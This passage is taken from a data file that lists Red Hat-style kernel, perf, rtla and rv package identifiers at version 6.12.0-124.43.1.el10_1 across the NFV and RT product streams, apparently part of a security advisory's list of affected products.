"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
